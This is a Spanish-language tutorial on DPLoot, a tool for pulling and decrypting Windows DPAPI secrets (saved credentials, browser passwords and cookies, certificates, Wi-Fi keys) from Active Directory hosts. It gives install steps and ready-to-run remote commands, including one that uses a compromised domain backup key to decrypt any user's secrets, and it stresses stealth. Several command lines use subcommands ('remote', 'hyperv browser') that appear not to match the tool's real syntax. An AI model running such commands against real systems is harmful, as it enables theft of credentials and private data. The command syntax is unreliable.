DPLoot: Active Directory Secret Extraction
DPLoot: Active Directory Secret Extraction
DPLoot es una herramienta extremadamente útil en auditorías de Active Directory y Pentesting. Su función principal es automatizar la recolección y el descifrado de secretos (credenciales, certificados, cookies de Chrome, etc.) que se encuentran dentro de los archivos de DPAPI (Data Protection API) de Windows.
Aquí tienes una guía rápida de qué es y cómo usarla en Kali Linux.
¿Qué hace DPLoot?
En Windows, muchos datos sensibles se cifran mediante la DPAPI. Estos "secretos" suelen estar protegidos por la contraseña del usuario o por claves de dominio (Backup Keys). DPLoot permite extraer:
Credenciales: Guardadas en el Administrador de Credenciales de Windows.
Navegadores: Contraseñas y cookies de Chrome, Edge y Brave.
Certificados: Archivos PFX y claves privadas.
Wifi: Contraseñas de redes inalámbricas guardadas.
Software: Credenciales de Outlook, WinSCP, RDP y más.
Instalación en Kali Linux
DPLoot está escrito en Python y utiliza la librería impacket. Puedes instalarlo fácilmente desde el repositorio oficial:
pip install dploot
O clonando el repositorio:
git clone https://github.com/zblurx/dploot.git
cd dploot
pip install .
Modos de Uso Comunes
DPLoot puede funcionar de dos maneras: de forma remota (atacando un equipo a través de la red) o de forma local (analizando archivos que ya has descargado).
1. Uso Remoto con Contraseña de Usuario
Si tienes las credenciales de un usuario, puedes extraer sus secretos de forma remota:
dploot remote -d dominio.local -u usuario -p 'contraseña' -target 192.168.1.100
2. Uso con la "Backup Key" del Dominio (El más potente)
Si has logrado comprometer la Domain Backup Key (usualmente con herramientas como mimikatz o secretsdump), puedes descifrar los secretos de cualquier usuario del dominio sin conocer su contraseña.
dploot remote -d dominio.local -u usuario_admin -p 'password' -target 192.168.1.100 -pvk domain_backup_key.pvk
3. Extraer solo navegadores (Chrome/Edge)
Si solo te interesan las contraseñas guardadas en el navegador:
dploot hyperv browser -d dominio.local -u usuario -p 'password' -target 192.168.1.100
¿Por qué es mejor que otros métodos?
Menos ruidoso: No necesita ejecutar un agente en el equipo víctima (agentless).
Automático: No tienes que descargar los archivos manualmente y luego usar otra herramienta para descifrarlos; DPLoot lo hace todo en un paso.
Integración: Funciona perfectamente con el flujo de trabajo de Impacket.
Nota de seguridad: Utiliza esta herramienta solo en entornos controlados o bajo autorización explícita (Pentesting ético).